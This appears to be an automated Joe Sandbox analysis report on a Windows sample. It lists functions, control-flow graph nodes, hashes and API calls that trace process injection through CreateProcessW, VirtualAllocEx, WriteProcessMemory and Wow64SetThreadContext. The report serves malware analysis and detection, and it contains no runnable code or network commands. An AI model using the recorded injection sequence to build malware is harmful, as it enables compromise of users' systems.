                                                      • Instruction Fuzzy Hash: 54528174A012198FEB64CF69D988B99BBF1FF49310F1481E9E909A7365DB309E84CF50
                                                      Function 017E3A01 Relevance: .6, Instructions: 569COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 764 17e3a01-17e3a15 765 17e3a86-17e3b28 764->765 766 17e3a17-17e3a44 764->766 770 17e3b3f-17e3b43 765->770 767 17e3a4b-17e3a85 766->767 768 17e3a46 766->768 767->765 768->767 771 17e3b2a-17e3b3c 770->771 772 17e3b45-17e3b4c 770->772 771->770 772->772 773 17e3b4e-17e3b53 772->773 775 17e3b65-17e3b92 773->775 776 17e3b55-17e3b5f 773->776 779 17e403a-17e4041 775->779 780 17e3b98-17e3b9f 775->780 776->775 782 17e4047-17e404e 779->782 783 17e4171-17e4178 779->783 780->780 781 17e3ba1-17e3c6f 780->781 823 17e3ca6-17e3cb2 781->823 786 17e40ae-17e410d call 17e04dc 782->786 787 17e4050-17e405a 782->787 784 17e417a-17e4181 783->784 785 17e41a7-17e41de 783->785 784->784 789 17e4183-17e41a4 784->789 802 17e41eb-17e41ee 785->802 803 17e41e0-17e41e2 785->803 814 17e4113-17e413a 786->814 790 17e405c-17e4063 787->790 791 17e409b-17e40a8 787->791 790->790 794 17e4065-17e4099 790->794 791->786 794->786 807 17e41f5-17e423f 802->807 808 17e41f0 802->808 804 17e41e9 803->804 805 17e41e4 803->805 804->807 805->804 808->807 818 17e415e-17e4164 814->818 819 17e413c-17e4143 814->819 818->814 822 17e4166-17e416b 818->822 819->819 821 17e4145-17e4158 819->821 821->818 822->783 824 17e3cb4-17e3cb8 823->824 825 17e3c71-17e3c7d 823->825 828 17e3cee-17e3d09 824->828 829 17e3cba-17e3cc1 824->829 826 17e3c7f 825->826 827 17e3c84-17e3c90 825->827 826->827 830 17e3c92-17e3c99 827->830 831 17e3ca3 827->831 835 17e3d0b-17e3d12 828->835 836 17e3d79-17e3d94 828->836 829->829 832 17e3cc3-17e3ce8 829->832 830->830 834 17e3c9b-17e3ca1 830->834 831->823 832->828 834->824 835->835 838 17e3d14-17e3d1e 835->838 844 17e3d99-17e3e42 836->844 839 17e3d66-17e3d73 838->839 840 17e3d20-17e3d27 838->840 839->836 840->840 843 17e3d29-17e3d64 840->843 843->836 854 17e3eb1-17e3eeb 844->854 856 17e3eff-17e4034 854->856 857 17e3eed 854->857 856->779 858 17e3e44-17e3eae 857->858 859 17e3ef3-17e3ef9 857->859 858->854 859->856 859->858
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b867f7be5a3998d3f5149d0eeff45d607d54bbf9c463234ae02b2e50989bddb6
                                                      • Instruction ID: 0fcb90c7029d13d8aecf1b494a8a83a2a078512203e954032592eb8518e745f5
                                                      • Opcode Fuzzy Hash: b867f7be5a3998d3f5149d0eeff45d607d54bbf9c463234ae02b2e50989bddb6
                                                      • Instruction Fuzzy Hash: F2428274A01219CFDB64CF69D984B99BBF1BF49310F1091EAE909A7365DB309E85CF10
                                                      Function 017E578C Relevance: 1.7, APIs: 1, Instructions: 241processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 17e578c-17e578e 1 17e5795-17e5823 0->1 2 17e5790-17e5793 0->2 4 17e583a-17e5848 1->4 5 17e5825-17e5837 1->5 2->1 6 17e585f-17e589b 4->6 7 17e584a-17e585c 4->7 5->4 8 17e58af-17e598a CreateProcessW 6->8 9 17e589d-17e58ac 6->9 7->6 13 17e598c-17e5992 8->13 14 17e5993-17e5a5c 8->14 9->8 13->14 23 17e5a5e-17e5a87 14->23 24 17e5a92-17e5a9d 14->24 23->24 27 17e5a9e 24->27 27->27
                                                      APIs
                                                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 017E5977
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 250f48065a3d5e81abb0f507fce334edd6f7d598e3a9e607a0fb137ca51f449f
                                                      • Instruction ID: 06161e45d1c3e06819c51a9e3b4ef3d5da2770df2a72704d10e256d3aa2984f0
                                                      • Opcode Fuzzy Hash: 250f48065a3d5e81abb0f507fce334edd6f7d598e3a9e607a0fb137ca51f449f
                                                      • Instruction Fuzzy Hash: F281CE75C0022DDFDB25CFA9D884BDEBBF5AB09304F0490AAE548B7220DB709A85CF54
                                                      Function 017E5798 Relevance: 1.7, APIs: 1, Instructions: 236processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 29 17e5798-17e5823 30 17e583a-17e5848 29->30 31 17e5825-17e5837 29->31 32 17e585f-17e589b 30->32 33 17e584a-17e585c 30->33 31->30 34 17e58af-17e598a CreateProcessW 32->34 35 17e589d-17e58ac 32->35 33->32 39 17e598c-17e5992 34->39 40 17e5993-17e5a5c 34->40 35->34 39->40 49 17e5a5e-17e5a87 40->49 50 17e5a92-17e5a9d 40->50 49->50 53 17e5a9e 50->53 53->53
                                                      APIs
                                                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 017E5977
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 81bb4bc8ab12f6a97d31d5a20e9280035c678711112232ed92b68b210bb25ac5
                                                      • Instruction ID: 3dbfa035f52a885da836648ad085c5d5a258c65152d36d42cf1388d0f0d7ef2d
                                                      • Opcode Fuzzy Hash: 81bb4bc8ab12f6a97d31d5a20e9280035c678711112232ed92b68b210bb25ac5
                                                      • Instruction Fuzzy Hash: 7781BE74C0022DDFDB25CFA9D984BDEBBF5AB49304F0090AAE549B7220DB709A85DF54
                                                      Function 017E5E40 Relevance: 1.6, APIs: 1, Instructions: 114injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 55 17e5e40-17e5e42 56 17e5e49-17e5eaf 55->56 57 17e5e44-17e5e48 55->57 59 17e5ec6-17e5f26 WriteProcessMemory 56->59 60 17e5eb1-17e5ec3 56->60 57->56 61 17e5f2f-17e5f6d 59->61 62 17e5f28-17e5f2e 59->62 60->59 62->61
                                                      APIs
                                                      • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 017E5F16
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: f0aa22a0b4e197d9ecbc17dab9be2be8868f4347a9daf295c03b4eacaa658288
                                                      • Instruction ID: 0f3ddd270ab483e731ef7e53b9bf685cf35eaae2d1b63bb732cbbf49169c9c6f
                                                      • Opcode Fuzzy Hash: f0aa22a0b4e197d9ecbc17dab9be2be8868f4347a9daf295c03b4eacaa658288
                                                      • Instruction Fuzzy Hash: 75417BB9D04258DFCB10CFA9D984ADEFBF1BB09314F24906AE818B7210D375AA45CF54
                                                      Function 017E5E48 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 65 17e5e48-17e5eaf 67 17e5ec6-17e5f26 WriteProcessMemory 65->67 68 17e5eb1-17e5ec3 65->68 69 17e5f2f-17e5f6d 67->69 70 17e5f28-17e5f2e 67->70 68->67 70->69
                                                      APIs
                                                      • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 017E5F16
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 29f8f8258923fbafa60c725a80f3b4aaf6fa507d1cd47e78064cefd3602f3ecf
                                                      • Instruction ID: 147a0648d101f39c2bdf41e934f0ca4826e176b191b20cdbfaa029b37cea5619
                                                      • Opcode Fuzzy Hash: 29f8f8258923fbafa60c725a80f3b4aaf6fa507d1cd47e78064cefd3602f3ecf
                                                      • Instruction Fuzzy Hash: 914189B9D04258DFCB00CFA9D984ADEFBF1BB09314F24902AE818B7210D375AA45CF64
                                                      Function 017E5C20 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 73 17e5c20-17e5c22 74 17e5c29-17e5ce5 ReadProcessMemory 73->74 75 17e5c24 73->75 76 17e5cee-17e5d2c 74->76 77 17e5ce7-17e5ced 74->77 75->74 77->76
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 017E5CD5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: ee8df2b68277e874f5de3e23517b34161651c65f2974dd9b9f593bf5b00de534
                                                      • Instruction ID: 39659c38082ca8d5affb8c9dabf837c6a3ec654a3991acdf1b8538580864ef0c
                                                      • Opcode Fuzzy Hash: ee8df2b68277e874f5de3e23517b34161651c65f2974dd9b9f593bf5b00de534
                                                      • Instruction Fuzzy Hash: B34187B9D042589FCF10CFAAD984ADEFBF1BB19314F14906AE814B7210C375A945CF65
                                                      Function 017E5C28 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 80 17e5c28-17e5ce5 ReadProcessMemory 82 17e5cee-17e5d2c 80->82 83 17e5ce7-17e5ced 80->83 83->82
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 017E5CD5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: a7b4a9062d2c11d762b5894cc306dd68a9efa531ce4c2c4e2323ce8ec453c65c
                                                      • Instruction ID: e6806176445b159ad8123062b77b7d12a3fddb6643033f77df8a671d75d31e9e
                                                      • Opcode Fuzzy Hash: a7b4a9062d2c11d762b5894cc306dd68a9efa531ce4c2c4e2323ce8ec453c65c
                                                      • Instruction Fuzzy Hash: 063174B9D042589FCB10CFAAD984ADEFBF1BB19314F10A06AE814B7210D375A945CF65
                                                      Function 017E5D38 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 86 17e5d38-17e5d3b 87 17e5d40-17e5df5 VirtualAllocEx 86->87 88 17e5dfe-17e5e34 87->88 89 17e5df7-17e5dfd 87->89 89->88
                                                      APIs
                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 017E5DE5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 28d5da45f94677b10d337ba373ce77e054918d1f42d92ed35942bbd7d7c3b782
                                                      • Instruction ID: 006170de5b34a4ba0d3d089ccdbf69a8c14d9b913e76cb71776d0170b633bf1b
                                                      • Opcode Fuzzy Hash: 28d5da45f94677b10d337ba373ce77e054918d1f42d92ed35942bbd7d7c3b782
                                                      • Instruction Fuzzy Hash: 843176B9D04258AFCB10CFA9D884A9EFBF5AB19314F10A01AE814B7310D375A945CF65
                                                      Function 017E5D40 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 92 17e5d40-17e5df5 VirtualAllocEx 93 17e5dfe-17e5e34 92->93 94 17e5df7-17e5dfd 92->94 94->93
                                                      APIs
                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 017E5DE5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 24a4c75ea926fa1b69a48de12e35ad94b21b88c3f194befd886bb915aa73401f
                                                      • Instruction ID: 04c743811a4ebb6ffa9a2254046eb27be43294351c9c2531f4578ec476ee9da5
                                                      • Opcode Fuzzy Hash: 24a4c75ea926fa1b69a48de12e35ad94b21b88c3f194befd886bb915aa73401f
                                                      • Instruction Fuzzy Hash: 6C3184B8D042589FCF10CFA9E884A9EFBF5AB09310F10A02AE814BB310D375A945CF65
                                                      Function 017E5B10 Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 97 17e5b10-17e5b74 99 17e5b8b-17e5bd2 Wow64SetThreadContext 97->99 100 17e5b76-17e5b88 97->100 101 17e5bdb-17e5c13 99->101 102 17e5bd4-17e5bda 99->102 100->99 102->101
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 017E5BC2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 3a10a51c59c4afa55d12d801cbcd2c8535c6e45b36452c0d31749e3697b9a583
                                                      • Instruction ID: 007b97ab709ba710d09520f53c90bf0a21fe76eda281c1bf9a9a6d919563e967
                                                      • Opcode Fuzzy Hash: 3a10a51c59c4afa55d12d801cbcd2c8535c6e45b36452c0d31749e3697b9a583
                                                      • Instruction Fuzzy Hash: 0631ABB4D012589FCB14CFAAD984ADEFBF1BB09314F24906AE814B7350D374A945CF64
                                                      Function 017E5B18 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 105 17e5b18-17e5b74 106 17e5b8b-17e5bd2 Wow64SetThreadContext 105->106 107 17e5b76-17e5b88 105->107 108 17e5bdb-17e5c13 106->108 109 17e5bd4-17e5bda 106->109 107->106 109->108
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 017E5BC2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: ae9b66e5936de8a9de950c892f74dba04fe8e98ec1d31a613c8896a447efea5c
                                                      • Instruction ID: 02811d4aca98875050d6327d36abc54b19aaa99dae4928533a508da2ff730f01
                                                      • Opcode Fuzzy Hash: ae9b66e5936de8a9de950c892f74dba04fe8e98ec1d31a613c8896a447efea5c
                                                      • Instruction Fuzzy Hash: FE31AAB8D012589FCB14CFAAD884ADEFBF1BB08314F24802AE414B7210C378A945CF64
                                                      Function 016ED224 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3319163856.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_16ed000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8476cd645ac4e1c75e6a194e19e5f30c93f79c845f0271bc8c3a2e24e3801cba
                                                      • Instruction ID: 87faf846925bcac55290273369f7e399fe0e5d9b020b5edeb2233ae69db4adf0
                                                      • Opcode Fuzzy Hash: 8476cd645ac4e1c75e6a194e19e5f30c93f79c845f0271bc8c3a2e24e3801cba
                                                      • Instruction Fuzzy Hash: 0621F872505244EFDB15DF94DDC8B16BBA5FB88324F24C769EA050F246C336D416CBA2
                                                      Function 016ED21F Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3319163856.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_16ed000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0bbd8854ea923840acf4f22191579eb3b725da890e88cb42a0af1176dfa26e5d
                                                      • Instruction ID: a9ec09647e302dc40a464fa6c6761269a86fb8c9ee773bb67c43b1e4d1b7ae57
                                                      • Opcode Fuzzy Hash: 0bbd8854ea923840acf4f22191579eb3b725da890e88cb42a0af1176dfa26e5d
                                                      • Instruction Fuzzy Hash: 63219D76504280DFCB06CF54D9C4B16BFA2FB88324F24C6A9D9090A656C33AD456CBA2

                                                      Execution Graph

                                                      Execution Coverage:1.2%
                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                      Signature Coverage:8.1%
                                                      Total number of Nodes:135
                                                      Total number of Limit Nodes:9
                                                      execution_graph 95287 42f483 95288 42f3f3 95287->95288 95291 42f450 95288->95291 95293 42e273 95288->95293 95290 42f42d 95296 42e193 95290->95296 95299 42c403 95293->95299 95295 42e28e 95295->95290 95302 42c453 95296->95302 95298 42e1ac 95298->95291 95300 42c420 95299->95300 95301 42c431 RtlAllocateHeap 95300->95301 95301->95295 95303 42c470 95302->95303 95304 42c481 RtlFreeHeap 95303->95304 95304->95298 95305 424483 95306 42449f 95305->95306 95307 4244c7 95306->95307 95308 4244db 95306->95308 95309 42c0f3 NtClose 95307->95309 95315 42c0f3 95308->95315 95311 4244d0 95309->95311 95312 4244e4 95318 42e2b3 RtlAllocateHeap 95312->95318 95314 4244ef 95316 42c110 95315->95316 95317 42c121 NtClose 95316->95317 95317->95312 95318->95314 95338 42f353 95339 42f363 95338->95339 95340 42f369 95338->95340 95341 42e273 RtlAllocateHeap 95340->95341 95342 42f38f 95341->95342 95430 424823 95431 42483c 95430->95431 95432 424887 95431->95432 95435 4248ca 95431->95435 95437 4248cf 95431->95437 95433 42e193 RtlFreeHeap 95432->95433 95434 424897 95433->95434 95436 42e193 RtlFreeHeap 95435->95436 95436->95437 95438 42b6e3 95439 42b6fd 95438->95439 95442 1af2df0 LdrInitializeThunk 95439->95442 95440 42b725 95442->95440 95319 411483 95320 411498 95319->95320 95325 413783 95320->95325 95323 42c0f3 NtClose 95324 4114ae 95323->95324 95326 4137a9 95325->95326 95327 4114a4 95326->95327 95329 413503 95326->95329 95327->95323 95332 42c373 95329->95332 95333 42c38d 95332->95333 95336 1af2c70 LdrInitializeThunk 95333->95336 95334 413525 95334->95327 95336->95334 95443 41ad73 95444 41adb7 95443->95444 95445 42c0f3 NtClose 95444->95445 95446 41add8 95444->95446 95445->95446 95447 413a73 95448 413a88 95447->95448 95453 417233 95448->95453 95450 413aab 95451 413af0 95450->95451 95452 413adf PostThreadMessageW 95450->95452 95452->95451 95454 417257 95453->95454 95455 417293 LdrLoadDll 95454->95455 95456 41725e 95454->95456 95455->95456 95456->95450 95343 401bd5 95345 401be5 95343->95345 95344 401b93 95345->95344 95348 42f823 95345->95348 95351 42dd63 95348->95351 95352 42dd86 95351->95352 95363 4072d3 95352->95363 95354 42dd9c 95355 401d1b 95354->95355 95366 41ab83 95354->95366 95357 42ddbb 95358 42ddd0 95357->95358 95381 42c4a3 95357->95381 95377 427db3 95358->95377 95361 42ddea 95362 42c4a3 ExitProcess 95361->95362 95362->95355 95365 4072e0 95363->95365 95384 415ef3 95363->95384 95365->95354 95367 41abaf 95366->95367 95402 41aa73 95367->95402 95370 41abf4 95372 41ac10 95370->95372 95375 42c0f3 NtClose 95370->95375 95371 41abdc 95373 41abe7 95371->95373 95374 42c0f3 NtClose 95371->95374 95372->95357 95373->95357 95374->95373 95376 41ac06 95375->95376 95376->95357 95378 427e14 95377->95378 95380 427e21 95378->95380 95413 418093 95378->95413 95380->95361 95382 42c4bd 95381->95382 95383 42c4ce ExitProcess 95382->95383 95383->95358 95385 415f0d 95384->95385 95387 415f26 95385->95387 95388 42cb33 95385->95388 95387->95365 95390 42cb4d 95388->95390 95389 42cb7c 95389->95387 95390->95389 95395 42b733 95390->95395 95393 42e193 RtlFreeHeap 95394 42cbf5 95393->95394 95394->95387 95396 42b750 95395->95396 95399 1af2c0a 95396->95399 95397 42b77c 95397->95393 95400 1af2c1f LdrInitializeThunk 95399->95400 95401 1af2c11 95399->95401 95400->95397 95401->95397 95403 41ab69 95402->95403 95404 41aa8d 95402->95404 95403->95370 95403->95371 95408 42b7d3 95404->95408 95407 42c0f3 NtClose 95407->95403 95409 42b7ed 95408->95409 95412 1af35c0 LdrInitializeThunk 95409->95412 95410 41ab5d 95410->95407 95412->95410 95414 4180aa 95413->95414 95420 4185bb 95414->95420 95421 4136e3 95414->95421 95416 4181ea 95417 42e193 RtlFreeHeap 95416->95417 95416->95420 95418 418202 95417->95418 95419 42c4a3 ExitProcess 95418->95419 95418->95420 95419->95420 95420->95380 95425 413703 95421->95425 95423 41376c 95423->95416 95424 413762 95424->95416 95425->95423 95426 41ae93 RtlFreeHeap LdrInitializeThunk 95425->95426 95426->95424 95427 4187d8 95428 42c0f3 NtClose 95427->95428 95429 4187e2 95428->95429 95337 1af2b60 LdrInitializeThunk

                                                      Executed Functions

                                                      Function 00417233 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 112 417233-41725c call 42ee93 115 417262-417270 call 42f493 112->115 116 41725e-417261 112->116 119 417280-417291 call 42d833 115->119 120 417272-41727d call 42f733 115->120 125 417293-4172a7 LdrLoadDll 119->125 126 4172aa-4172ad 119->126 120->119 125->126
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172A5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: e16a34ff752e58ab3819758e70589ed3c0c4bade0b9e16962d66035ee37cb21f
                                                      • Instruction ID: 4ebc492c990642ae82a12282fd151a353d3f1970f32c396ba538127b5767a14e
                                                      • Opcode Fuzzy Hash: e16a34ff752e58ab3819758e70589ed3c0c4bade0b9e16962d66035ee37cb21f
                                                      • Instruction Fuzzy Hash: 300152B1E0010DA7DB10DAE1DC42FDEB3B89B54308F0041A6F90897240F635EB498B55
                                                      Function 0042C0F3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 146 42c0f3-42c12f call 4047a3 call 42d323 NtClose
                                                      APIs
                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C12A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 7fea8813780153429a3e2bc9ce62912ee225e97507eed709cacbc900be663fb2
                                                      • Instruction ID: defc0cc7c6ea004b891c9d4643a6f9115435f1e7ed272e3c7b044ec12ea88ae9
                                                      • Opcode Fuzzy Hash: 7fea8813780153429a3e2bc9ce62912ee225e97507eed709cacbc900be663fb2
                                                      • Instruction Fuzzy Hash: C3E0DF352002007BC610EE1ADC01F8B736CDBC2314F00401AFA4867141CA70790187A1
                                                      Function 01AF2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 160 1af2b60-1af2b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e0b2088d070ae7e6ba56f437aab096d46d2282297eaedcc1dc6655e75a02b7f4
                                                      • Instruction ID: 5c96aef408457ed280fd3883dcbc858769536541f53640441b60911387e76d72
                                                      • Opcode Fuzzy Hash: e0b2088d070ae7e6ba56f437aab096d46d2282297eaedcc1dc6655e75a02b7f4
                                                      • Instruction Fuzzy Hash: 0890026260280043410A71584414616440A97E0241B55C061E10145D5DC6258AD16225
                                                      Function 01AF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 162 1af2df0-1af2dfc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e4ff844f74eb8889034fac977234c54372e0a7f8f8c16d5f7045a14561317ec9
                                                      • Instruction ID: 4625fd114ce2645afef411ebfb12b3f7908b2250e060b89d6289273c21162be5
                                                      • Opcode Fuzzy Hash: e4ff844f74eb8889034fac977234c54372e0a7f8f8c16d5f7045a14561317ec9
                                                      • Instruction Fuzzy Hash: 5E90023260180453D11671584504707040997D0281F95C452A042459DDD7568B92A221
                                                      Function 01AF2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 161 1af2c70-1af2c7c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d37cc8d9fca5d477c40688d7715fed5259d32aea2e4469be626d2ce555fa3794
                                                      • Instruction ID: e6f1855a17781af26dec0b15052c4fa04d9ddb72a5f43a98e355ae6150167d38
